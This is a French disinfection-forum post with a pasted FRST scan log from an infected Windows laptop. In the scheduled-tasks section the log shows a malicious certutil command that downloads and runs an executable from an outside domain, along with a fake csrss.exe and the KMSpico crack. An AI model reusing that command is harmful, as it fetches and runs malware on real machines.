INTERPRETER RAPPORT FRST

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

Abelninon
Messages : 1
Inscription : 09 déc. 2020 16:29

INTERPRETER RAPPORT FRST

par Abelninon »

Code : Tout sélectionner

Résultats d'analyse de  Farbar Recovery Scan Tool (FRST) (x64) Version: 09-12-2020
Exécuté par HP (administrateur) sur DESKTOP-GCFI703 (Hewlett-Packard HP EliteBook 840 G1) (09-12-2020 15:14:37)
Exécuté depuis C:\Users\HP\Downloads
Profils chargés: HP
Platform: Windows 10 Pro Version 1909 18363.1198 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

() [Fichier non signé] C:\oraclexe\app\oracle\product\10.2.0\server\BIN\TNSLSNR.EXE
() [Fichier non signé] C:\Users\HP\AppData\Local\Temp\csrss\wup\xarch\wup.exe
() [Fichier non signé] C:\Users\HP\AppData\Local\Temp\csrss\ww30.exe
() [Fichier non signé] C:\Windows\rss\csrss.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe <2>
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <34>
(Hewlett-Packard Company -> Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SecurityHealthHost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows Hardware Compatibility Publisher -> ) C:\Windows\System32\fpCSEvtSvc.exe
(Microsoft Windows Hardware Compatibility Publisher -> Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(MiniTool Software Limited -> ) C:\Program Files\MiniTool ShadowMaker\AgentService.exe
(MiniTool Software Limited -> ) C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
(MongoDB, Inc) [Fichier non signé] C:\Program Files\MongoDB\Server\4.2\bin\mongod.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oracle Corporation) [Fichier non signé] C:\oraclexe\app\oracle\product\10.2.0\server\BIN\oracle.exe
(Protected Antivirus Limited -> TotalAV) C:\Program Files (x86)\TotalAV\SecurityService.exe
(Protected Antivirus Limited -> TotalAV) C:\Program Files (x86)\TotalAV\TotalAV.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.) C:\Windows\RtsCM64.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RtsCM] => C:\Windows\RTSCM64.EXE [225280 2017-03-09] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corp.)
HKLM\...\Run: [MTPW] => C:\Program Files\MiniTool Partition Wizard 12\updatechecker.exe [219616 2020-02-19] (MiniTool Software Limited -> )
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM-x32\...\Run: [MTSM] => C:\Program Files\MiniTool ShadowMaker\SMMonitor.exe [1060320 2019-12-12] (MiniTool Software Limited -> )
HKLM-x32\...\Run: [vmware-tray.exe] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [117680 2019-11-04] (VMware, Inc. -> VMware, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-16] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [BestZiper] => C:\Program Files (x86)\BestZip\BestZip.exe [1513472 2020-10-22] () [Fichier non signé]
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [Chromium] => "c:\users\hp\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [uTorrent] => C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe [2113240 2020-11-28] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-10-22] (Adobe Inc. -> Adobe Systems Incorporated)
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\Run: [SummerFrost] => C:\Windows\rss\csrss.exe [4029952 2020-12-09] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-3974141972-1419997195-1840478993-1001\...\MountPoints2: {0bf5e1c5-b3a0-11ea-9208-801934321cdd} - "E:\HiSuiteDownLoader.exe" 
HKLM\...\Print\Monitors\HP c111 Status Monitor: C:\Windows\system32\hpinkstsc111LM.dll [333496 2012-12-16] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.88\Installer\chrmstp.exe [2020-12-02] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\77.0.3865.90\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {09994AAF-DDF1-4B41-9494-555871D6531F} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://souffity.com/app/app.exe C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://souffity.com/app/app.exe C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\HP\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {1518E5B3-9CE3-405C-89FF-37FCDDE3B71F} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [143712 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {15FDC9F8-D147-4BA6-8D73-A3FC8535AD34} - System32\Tasks\Opera scheduled Autoupdate 1592151428 => C:\Users\HP\AppData\Local\Programs\Opera\launcher.exe
Task: {1809E38D-A98B-4D1A-B293-00CD2D6564F8} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
Task: {1E1C72EE-A613-41CA-8BD6-18CE6E36D399} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [5745672 2014-03-06] (Hewlett Packard -> Hewlett-Packard Co.)
Task: {29424055-15DD-4869-98DD-EC692D730D1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1341008 2020-09-06] (Adobe Inc. -> Adobe Inc.)
Task: {336EB4B6-74A5-44F8-B0CF-54E566449D87} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2020-06-09] () [Fichier non signé]
Task: {42426DE4-FD4A-44D5-A005-65BDF0737243} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {6926EC8D-9B2D-4B3E-AF1A-61DE10EF0446} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4029952 2020-12-09] () [Fichier non signé] <==== ATTENTION
Task: {8614D6F5-47D6-4858-BB95-4EA01819CEBE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {92F6DC21-6B71-4E03-8A4C-78274AD7A860} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe [740544 2015-11-01] () [Fichier non signé]
Task: {A272E5E2-FF9E-4937-98DC-D76978522B7B} - System32\Tasks\Opera scheduled assistant Autoupdate 1592151434 => C:\Users\HP\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\HP\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {A9D789F5-85A3-4D21-9BCC-B4DA25A68C12} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AF1F10C1-1DF5-4776-9189-569DA6E4FC5C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5142960 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {B0892B3E-9B5C-489C-BE6E-4DEE753C0F5B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B8B055CF-B2F1-4868-A26C-5E0C272D451F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BC40A973-5FEE-4E51-AA12-6EE711FABF6D} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [143712 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {CDB0FE8F-460D-4B7F-9732-58FE426E7526} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5142960 2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Task: {D437B3DF-1713-4646-9B24-AC3DEB5B9620} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {EE5392C3-70C9-483C-87A8-88313616FAA2} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
Task: {F4F300AB-CA3F-4008-B2CD-EA414D1ED1B3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F9A232A4-B576-43F5-BE88-BEBA1A937BBA} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-17] (Mozilla Corporation -> Mozilla Foundation)
Task: {FE36205F-4250-46F2-B42D-BACA3A176872} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe [65440 2020-06-10] (Microsoft Corporation -> Microsoft)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)


==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\..\Interfaces\{1150ee4f-cb6e-47bf-8a78-4f462bc1d8f2}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{5970a743-2245-4f09-b25f-916888c97f63}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{91799e7c-16b1-48c8-8e9e-a9de85b60c72}: [DhcpNameServer] 192.168.0.1

Edge: 
======
DownloadDir: D:\Téléchargements
Edge HomeButtonPage: HKU\S-1-5-21-3974141972-1419997195-1840478993-1001 -> hxxp://www.surf-ma.com/
Edge DefaultProfile: Default
Edge Profile: C:\Users\HP\AppData\Local\Microsoft\Edge\User Data\Default [2020-12-09]
Edge DownloadDir: D:\Téléchargements
Edge Notifications: Default -> hxxps://www.facebook.com
Edge HomePage: Default -> hxxp://www.surf-ma.com/
Edge StartupUrls: Default -> "hxxp://www.surf-ma.com/"
Edge Extension: (Avast Online Security) - C:\Users\HP\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fdgpikaaheckgdijjmepmdjjkbceakif [2020-07-24]
Edge Extension: (McAfee® WebAdvisor) - C:\Users\HP\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fdhgeoginicibhagdmblfikbgbkahibd [2020-11-17]

FireFox:
========
FF DefaultProfile: ntwy0jos.default
FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\ntwy0jos.default [2020-07-27]
FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\a9s7su6g.default-release [2020-12-09]
FF Plugin: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-11-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-11-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-04-23] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2020-07-29] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2020-07-29] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-10-22] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default [2020-12-09]
CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E210FR91105G0&p={searchTerms}
CHR DefaultSearchKeyword: Default -> mcafee
CHR DefaultSuggestURL: Default -> hxxps://fr.search.yahoo.com/sugg/gossip/gossip-fr-partner?output=fxjson&appid=mca&source=yahoo_mcafee_searchassist&command={searchTerms}
CHR Extension: (Slides) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-06-11]
CHR Extension: (Docs) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-06-11]
CHR Extension: (Google Drive) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-23]
CHR Extension: (YouTube) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-06-11]
CHR Extension: (Adobe Acrobat) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-12-09]
CHR Extension: (Sheets) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-06-11]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2020-12-08]
CHR Extension: (Google Docs hors connexion) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-17]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-06-11]
CHR Extension: (Google Translate) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\phcmjjmajdnjjoafcdjccagdpmoemeaa [2020-12-09]
CHR Extension: (Gmail) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-23]
CHR Extension: (Chrome Media Router) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-20]
CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\System Profile [2020-12-07]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-11-23] (Microsoft Corporation -> Microsoft Corporation)
R2 fpCsEvtSvc; C:\Windows\system32\fpCSEvtSvc.exe [22528 2015-06-10] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [Fichier non signé]
S2 Main Service; C:\Program Files (x86)\MachinerData\OSFMount.exe [2557952 2020-12-09] () [Fichier non signé]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [955656 2020-11-21] (McAfee, LLC -> McAfee, LLC)
R2 MongoDB; C:\Program Files\MongoDB\Server\4.2\bin\mongod.exe [36280320 2020-05-21] (MongoDB, Inc) [Fichier non signé]
R2 MTAgentService; C:\Program Files\MiniTool ShadowMaker\AgentService.exe [776160 2019-12-12] (MiniTool Software Limited -> )
R2 MTSchedulerService; C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe [226784 2019-12-12] (MiniTool Software Limited -> )
S4 OracleJobSchedulerXE; c:\oraclexe\app\oracle\product\10.2.0\server\Bin\extjob.exe [102400 2006-02-02] () [Fichier non signé]
S3 OracleMTSRecoveryService; C:\oraclexe\app\oracle\product\10.2.0\server\BIN\omtsreco.exe [57616 2006-02-02] (Oracle Corporation) [Fichier non signé]
R2 OracleServiceXE; c:\oraclexe\app\oracle\product\10.2.0\server\bin\ORACLE.EXE [59064320 2006-02-02] (Oracle Corporation) [Fichier non signé]
S3 OracleXEClrAgent; C:\oraclexe\app\oracle\product\10.2.0\server\bin\OraClrAgnt.exe [45056 2006-02-02] () [Fichier non signé]
R2 OracleXETNSListener; C:\oraclexe\app\oracle\product\10.2.0\server\BIN\tnslsnr.exe [204800 2006-02-02] () [Fichier non signé]
R2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [275112 2020-11-26] (Protected Antivirus Limited -> TotalAV) <==== ATTENTION
S2 SecurityServiceMonitor; C:\Program Files (x86)\TotalAV\SecurityService.exe [275112 2020-11-26] (Protected Antivirus Limited -> TotalAV) <==== ATTENTION
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6153048 2020-11-18] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [740544 2015-11-01] () [Fichier non signé]
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [53248 2015-06-10] (Microsoft Windows Hardware Compatibility Publisher -> Synaptics Incorporated)
S3 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15476144 2019-11-04] (VMware, Inc. -> )
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
R3 e2eVAWdm; C:\Windows\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R1 HelpSrv; C:\Windows\helpsrv.sys [195424 2020-12-09] (福建六壬网安股份有限公司 -> HelpSrv Network) [Fichier non signé] [Fichier en cours d'utilisation]
R3 iVCam; C:\Windows\system32\DRIVERS\iVCam.sys [1089512 2020-04-04] (Shanghai Yitu Information Technology Co., Ltd. -> e2eSoft)
R1 npcap; C:\Windows\system32\DRIVERS\npcap.sys [83728 2020-08-25] (Insecure.Com LLC -> Insecure.Com LLC.)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2019-11-08] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2019-11-08] (MiniTool Solution Ltd -> )
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166760 2020-04-24] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [174536 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 vmkbd3; C:\Windows\system32\DRIVERS\vmkbd.sys [52288 2019-11-04] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\system32\DRIVERS\vmnetbridge.sys [66368 2019-11-04] (VMware, Inc. -> VMware, Inc.)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103224 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [151184 2016-07-15] (NGO -> MBB)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
